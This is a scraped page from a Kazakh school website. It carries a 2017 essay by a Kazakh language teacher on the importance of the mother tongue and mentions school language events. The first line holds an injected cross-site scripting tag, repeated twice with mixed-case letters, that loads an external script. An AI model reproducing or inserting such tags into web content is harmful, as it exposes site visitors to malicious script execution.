<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.03.2017

Тілден артық қазына жоқ

  Қазақ елінің тарихында биылғы жыл тәуелсіздігіміздің 25 жылдығымен  ерекше

орын алады. Тарихымызбен бірге жасап келе жатқан тіліміз біздің мақтанышымыз .

Тіл- сан ғасырлар шежіресі. Тіл барлық асыл қасиеті, табан тірейтін тұғырлы

темір қазығымыз. Оны сақтап,  болашаққа  аманаттау ұрпақ борышы.

  Тіл тарихпен бірге өмір сүріп дамиды, себебі әр ұлттың тілі- оның бақыты, тірегі. Бүкіл түркі елдеріне ардақты ағартушы, ғұлама ғалым Ахмет Байтұрсынұлының «Тілі жоғалған жұрттың өзі жоғалады »  деген сөзінде үлкен мән жатыр.

  Тіл- ұлттық белгі, халықтық мұра, дүниетаным құралы. Халықтың тарихта қалуы тіліне байланысты. Қазақ тілі- дүние жүзіндегі ең бай, беделді де, бейнелі тілдердің бірі.

  Қазақ тілі бойға ана сүтімен бірге енеді. Ана тілін ардақтай білуіміз керек, қазақ тілі ананың әлдиінен, отбасындағы

тәлім-тәрбиеден бастау алады. Туған тілімен терең сусындау тәрбиемен

астарласады. Тілге құрмет, сүйіспеншілік бала кезден басталады. Мағжан Жұмабаев

айтпақшы «Жас бала- жас бір  шыбық, жас күнде қай түрде иіп тастасаң , есейгенде сол иілген күйінде қалмақ. Теріс иіліп қалған шыбықты түзеймін десең , сындырып аласың » демекші, жас шағынан  қазақ тілінің қадір- қасиетін жете түсіну қажет. Мектебімізде тіл мерекесіне байланысты көптеген іс- шараларды үзбей  өткіземіз. Сыныптар арасында сайыстар, ашық сабақтар, пікірталас, дебат өткізіледі.

Келешекте ана тіліміз тек биіктерден көрініп , өркендей берсін!

 

 

Қазақ тілі, әдебиеті пәні мұғалімі:  Хасенова Г.А.

 

Просмотров: 631

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу